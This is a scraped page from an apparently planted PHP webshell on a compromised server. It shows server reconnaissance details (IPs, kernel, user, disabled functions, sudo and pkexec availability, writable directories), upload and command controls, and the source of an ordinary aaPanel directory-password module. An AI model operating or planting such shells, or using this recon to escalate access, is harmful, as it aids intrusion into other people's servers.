403Webshell
Server IP : 104.21.38.3  /  Your IP : 162.158.88.162
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/server/panel/class_v2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/server/panel/class_v2/site_dir_auth_v2.py
#coding: utf-8
#-------------------------------------------------------------------
# aaPanel
#-------------------------------------------------------------------
# Copyright (c) 2015-2017 aaPanel(www.aapanel.com) All rights reserved.
#-------------------------------------------------------------------
# Author: zhwen <[email protected]>
#-------------------------------------------------------------------

#------------------------------
# 站点目录密码保护
#------------------------------
import public,re,os,json,shutil
from public.validate import Param

class SiteDirAuth:
    # 取目录加密状态
    def __init__(self):
        self.setup_path = public.GetConfigValue('setup_path')
        self.conf_file = self.setup_path + "/panel/data/site_dir_auth.json"
    # 读取配置
    def _read_conf(self):
        conf = public.readFile(self.conf_file)
        if not conf:
            conf = {}
            public.writeFile(self.conf_file,json.dumps(conf))
            return conf
        try:
            conf = json.loads(conf)
            if not isinstance(conf,dict):
                conf = {}
                public.writeFile(self.conf_file, json.dumps(conf))
        except:
            conf = {}
            public.writeFile(self.conf_file, json.dumps(conf))
        return conf

    def _write_conf(self,conf,site_name):
        c = self._read_conf()
        if not c or site_name not in c:
            c[site_name] = [conf]
        else:
            if site_name in c:
                c[site_name].append(conf)
        public.writeFile(self.conf_file,json.dumps(c))

    def _check_site_authorization(self,site_name):
        webserver=public.get_webserver()
        conf_file = "{setup_path}/panel/vhost/{webserver}/{site_name}.conf".format(
                setup_path=self.setup_path, site_name=site_name,webserver=webserver)
        if "Authorization" in public.readFile(conf_file):
            return True


    # 设置目录加密
    def set_dir_auth(self,get):
        '''
        get.name        auth_name
        get.site_dir         auth_dir
        get.username    username
        get.password    password
        get.id          site id
        :param get:
        :return:
        '''
        # 校验参数
        try:
            get.validate([
                Param('site_dir').String(),
                Param('name').String(),
                Param('username').String(),
                Param('password').String(),
                Param('id').Integer(),
            ], [
                public.validate.trim_filter(),
            ])
        except Exception as ex:
            public.print_log("error info: {}".format(ex))
            return public.return_message(-1, 0, str(ex))
        # if len(get.username) < 3 or len(get.password) < 3:
        #     return public.return_msg_gettext(False, public.lang("Username or password cannot be less than 3 characters"))
        # name = get.name
        param = self.__check_param(get)
        if param['status']==-1:
            return param
        param = param['message']
        password = param['password']
        username = param['username']
        name = param['name']
        site_dir = get.site_dir
        if public.get_webserver() == "openlitespeed":
            return public.return_message(-1, 0, public.lang("OpenLiteSpeed is currently not supported"))
        # if not hasattr(get,"password") or not get.password or not hasattr(get,"username") or not get.username:
        #     return public.return_msg_gettext(False, public.lang("Please enter an account or password"))
        if not get.site_dir:
            return public.return_message(-1, 0, public.lang("Please enter the directory to be protected"))
        if not get.name:
            return public.return_message(-1, 0, public.lang("Please enter the Name"))
        passwd = public.hasPwd(password)
        site_info = self.get_site_info(get.id)
        site_name = site_info["site_name"]
        if self._check_site_authorization(site_name):
            return public.return_message(-1, 0, public.lang("Site password protection has been set, please cancel and then set. Site directory --> Password access"))
        if self._check_dir_auth(site_name, name,site_dir):
            return public.return_message(-1, 0, public.lang("Directory has been protected"))
        auth = "{user}:{passwd}".format(user=username,passwd=passwd)
        auth_file = '{setup_path}/pass/{site_name}'.format(setup_path=self.setup_path,site_name=site_name)
        if not os.path.exists(auth_file):
            os.makedirs(auth_file)
        auth_file = auth_file+"/{}.pass".format(name)
        public.writeFile(auth_file,auth)
        # 配置独立认证文件
        self.set_dir_auth_file(site_info["site_path"],site_name,name,username,site_dir,auth_file)
        # 配置站点主文件
        result = self.set_conf(site_name,"create")
        if result:
            return public.return_message(0,0,result)
        # 检查配置
        webserver = public.get_webserver()
        result=self.check_site_conf(webserver,site_name,name)
        if result:
            return public.return_message(0,0,result)
        # 写配置
        conf = {"name":name,"site_dir":get.site_dir,"auth_file":auth_file}
        self._write_conf(conf,site_name)
        public.serviceReload()
        return public.return_message(0, 0, public.lang("Successfully created"))

    # 检查配置是否存在
    def _check_dir_auth(self, site_name, name,site_dir):
        conf = self._read_conf()
        if not conf:
            return False
        if site_name in conf:
            for i in conf[site_name]:
                if name in i.values() or site_dir == i["site_dir"]:
                    return True

    # 获取当前站点php版本
    def get_site_php_version(self,siteName):
        try:
            conf = public.readFile(self.setup_path + '/panel/vhost/'+public.get_webserver()+'/'+siteName+'.conf');
            if public.get_webserver() == 'nginx':
                rep = r"enable-php-(\w{2,5})\.conf"
                tmp = re.search(rep,conf)
                if not tmp:
                    rep = r"enable-php-(\d+-wpfastcgi).conf"
                    re.search(rep, conf)
            else:
                rep = r"php-cgi-(\w{2,5})\.sock"
            tmp = re.search(rep,conf).groups()
            if tmp:
                return tmp[0]
            else:
                return ""
        except:
            return public.return_msg_gettext(False, public.lang("Apache2.2 does NOT support MultiPHP!"))

    # 获取站点名
    def get_site_info(self,id):
        site_info = public.M('sites').where('id=?', (id,)).field('name,path').find()
        return {"site_name":site_info["name"],"site_path":site_info["path"]}

    def change_dir_auth_file_nginx_phpver(self,site_name,phpv,auth_name):
        file_path = "{setup_path}/panel/vhost/nginx/dir_auth/{site_name}/{auth_name}.conf".format(
            setup_path=self.setup_path,site_name=site_name,auth_name=auth_name)
        conf = public.readFile(file_path)
        if not conf:
            return False

        if phpv == 'other':
            php_conf = "include /www/server/panel/vhost/other_php/{}/enable-php-other.conf;".format(site_name)
        else:
            php_conf = 'include enable-php-{}.conf;'.format(phpv)

        rep = r"include\s+(enable-php-\w+|/www/server/panel/vhost/other_php/{}/enable-php-other)\.conf;".format(site_name)
        conf = re.sub(rep,php_conf,conf)

        public.writeFile(file_path,conf)

    # 设置独立认证文件
    def set_dir_auth_file(self,site_path,site_name,name,username,site_dir,auth_file):
        php_ver = self.get_site_php_version(site_name)
        php_conf = ""
        if php_ver:
            if php_ver == 'other':
                php_conf = "include /www/server/panel/vhost/other_php/{}/enable-php-{}.conf;".format(site_name,php_ver)
            else:
                php_conf = "include enable-php-{}.conf;".format(php_ver)

        for i in ["nginx","apache"]:
            file_path = "{setup_path}/panel/vhost/{webserver}/dir_auth/{site_name}"
            if i == "nginx":
                # 设置nginx
                conf = '''location ~* ^%s* {
    #AUTH_START
    auth_basic "Authorization";
    auth_basic_user_file %s;
    %s
    #AUTH_END
}''' % (site_dir,auth_file,php_conf)
            else:
            # 设置apache
                conf = '''<Directory "{site_path}{site_dir}">
    #AUTH_START
    AuthType basic
    AuthName "Authorization "
    AuthUserFile {auth_file}
    Require user {username}
    #AUTH_END
    SetOutputFilter DEFLATE
    Options FollowSymLinks
    AllowOverride All
    #Require all granted
        DirectoryIndex index.php index.html index.htm default.php default.html default.htm
</Directory>'''.format(site_path=site_path,site_dir=site_dir,auth_file=auth_file,username=username,site_name=site_name)
            conf_file = file_path.format(setup_path=self.setup_path,site_name=site_name,webserver=i)
            if not os.path.exists(conf_file):
                os.makedirs(conf_file)
            conf_file = conf_file + '/{}.conf'.format(name)
            public.writeFile(conf_file,conf)

    # 设置apache配置
    def set_conf(self,site_name,act):
        for i in ["nginx", "apache"]:
            dir_auth_file = "%s/panel/vhost/%s/dir_auth/%s/*.conf" % (self.setup_path,i,site_name,)
            file = self.setup_path + "/panel/vhost/{}/".format(i) + site_name + ".conf"
            shutil.copyfile(file, '/tmp/{}_file_bk.conf'.format(i))

            if os.path.exists(file):
                conf = public.readFile(file)
                if i == "apache":
                    if act == "create":
                        rep = "IncludeOptional.*\\/dir_auth\\/.*conf(\n|.)+<\\/VirtualHost>"
                        rep1 = "</VirtualHost>"
                        if not re.search(rep, conf):
                            conf = conf.replace(rep1,
                                                "\n\t#Directory protection rules, do not manually delete\n\tIncludeOptional {}\n</VirtualHost>".format(
                                                    dir_auth_file))
                    else:
                        rep = "\n*#Directory protection rules, do not manually delete\n+\\s+IncludeOptional[\\s\\w\\/\\.\\*]+"
                        conf = re.sub(rep, '', conf)
                    public.writeFile(file, conf)
                else:
                    if act == "create":
                        rep = "#SSL-END(\n|.)+include.*\\/dir_auth\\/.*conf;"
                        rep1 = "#SSL-END"
                        if not re.search(rep,conf):
                            conf = conf.replace(rep1, rep1 + "\n\t#Directory protection rules, do not manually delete\n\tinclude {};".format(dir_auth_file))
                    else:
                        rep = "\n*#Directory protection rules, do not manually delete\n+\\s+include[\\s\\w\\/\\.\\*]+;"
                        conf = re.sub(rep, '', conf)
                    public.writeFile(file, conf)

    # 验证站点配置
    def check_site_conf(self,webserver,site_name,name):
        isError = public.checkWebConfig()
        auth_file = "{setup_path}/panel/vhost/{webserver}/dir_auth/{site_name}/{name}.conf".format(setup_path=self.setup_path,webserver=webserver,site_name=site_name,name=name)
        if (isError != True):
            os.remove(auth_file)
            # a_conf = self._read_conf()
            # for i in range(len(a_conf)-1,-1,-1):
            #     if site_name == a_conf[i]["sitename"] and a_conf[i]["proxyname"]:
            #         del a_conf[i]
            return public.return_msg_gettext(False, public.lang('ERROR: %s<br><a style="color:red;">' % public.lang("Configuration ERROR") + isError.replace("\n", '<br>') + '</a>'))

    # 删除密码保护
    def delete_dir_auth(self,get):
        '''
        get.id
        get.name
        :param get:
        :return:
        '''
        try:
            get.validate([
                Param('name').String(),
                Param('id').Integer(),
            ], [
                public.validate.trim_filter(),
            ])
        except Exception as ex:
            public.print_log("error info: {}".format(ex))
            return public.return_message(-1, 0, str(ex))

        name = get.name
        site_info = self.get_site_info(get.id)
        site_name = site_info["site_name"]
        conf = self._read_conf()
        if site_name not in conf:
            return public.return_message(-1,0,"The website does not exist in the configuration:{}",(site_name,))
        for i in range(len(conf[site_name])):
            if name in conf[site_name][i].values():
                print(conf[site_name][i])
                del(conf[site_name][i])
                if not conf[site_name]:
                    del(conf[site_name])
                break
        public.writeFile(self.conf_file,json.dumps(conf))
        for i in ["nginx", "apache"]:
            file_path = "{setup_path}/panel/vhost/{webserver}/dir_auth/{site_name}/{name}.conf".format(webserver=i,
                                                                                                       setup_path=self.setup_path,
                                                                                                       site_name=site_name,
                                                                                                       name=name)
            os.remove(file_path)
        if not conf:
            self.set_conf(site_name,"delete")
        if not hasattr(get,'multiple'):
            public.serviceReload()
        return public.return_message(0, 0, public.lang("Successfully deleted!"))

    # 修改目录保护密码
    def modify_dir_auth_pass(self,get):
        '''
        get.id
        get.name
        get.username
        get.password
        :param get:
        :return:
        '''
        # 校验参数
        try:
            get.validate([
                Param('name').String(),
                Param('username').String(),
                Param('password').String(),
                Param('id').Integer(),

            ], [
                public.validate.trim_filter(),
            ])
        except Exception as ex:
            public.print_log("error info: {}".format(ex))
            return public.return_message(-1, 0, str(ex))

        # if not hasattr(get,"password") or not get.password or not hasattr(get,"username") or not get.username:
        #     return public.return_msg_gettext(False, public.lang("Username or password cannot be less than 3 characters"))
        param = self.__check_param(get)
        if param['status']==-1:
            return param
        param = param['message']
        password = param['password']
        username = param['username']
        name = get.name
        site_info = self.get_site_info(get.id)
        site_name = site_info["site_name"]
        passwd = public.hasPwd(get.password)
        auth = "{user}:{passwd}".format(user=get.username,passwd=passwd)
        auth_file = '{setup_path}/pass/{site_name}/{name}.pass'.format(setup_path=self.setup_path,site_name=site_name,name=name)
        public.writeFile(auth_file,auth)
        public.serviceReload()
        return public.return_message(0, 0, public.lang("Setup successfully!"))

    # 获取目录保护列表
    def get_dir_auth(self,get):
        '''
        get.id
        get.sitename
        :param get:
        :return:
        '''
        # 校验参数
        try:
            get.validate([
                Param('id').Integer(),

            ], [
                public.validate.trim_filter(),
            ])
        except Exception as ex:
            public.print_log("error info: {}".format(ex))
            return public.return_message(-1, 0, str(ex))

        if not hasattr(get, 'siteName'):
            site_info = self.get_site_info(get.id)
            site_name = site_info["site_name"]
        else:
            site_name = get.siteName
        conf = self._read_conf()
        if site_name in conf:
            return public.return_message(0,0,{site_name:conf[site_name]})
        return public.return_message(0,0,{})

    def __check_param(self, get):
        values = {}
        if hasattr(get, "password"):
            if not get.password:
                return public.return_message(-1, 0, public.lang("Please enter password!"))
            password = get.password.strip()
            if len(password) < 3:
                return public.return_message(-1, 0, public.lang("Password cannot be less than 3 characters"))
            if re.search(r'\s', password):
                return public.return_message(-1, 0, public.lang("Password cannot contain spaces"))
            values['password'] = password

        if hasattr(get, "username"):
            if not get.username:
                return public.return_message(-1, 0, public.lang("Please enter username!"))
            username = get.username.strip()
            if len(username) < 3:
                return public.return_message(-1, 0, public.lang("Username cannot be less than 3 characters"))
            if re.search(r'\s', username):
                return public.return_message(-1, 0, public.lang("Username cannot contain spaces"))
            values['username'] = username

        if hasattr(get, "name"):
            if not get.name:
                return public.return_message(-1, 0, public.lang("Please enter a name!"))
            name = get.name.strip()
            if len(name) < 3:
                return public.return_message(-1, 0, public.lang("Name cannot be less than 3 characters"))
            if re.search(r'\s', name):
                return public.return_message(-1, 0, public.lang("Name cannot contain spaces"))
            if re.search('[\\/\"\'\\!@#$%^&*()+={}\\[\\]\\:\\;\\?><,./\\\\]+', name):
                return public.return_message(-1, 0, public.lang("Name format must be [ aaa_bbb ]"))
            values['name'] = name

        return public.return_message(0,0, values)

Youez - 2016 - github.com/yon3zu
LinuXploit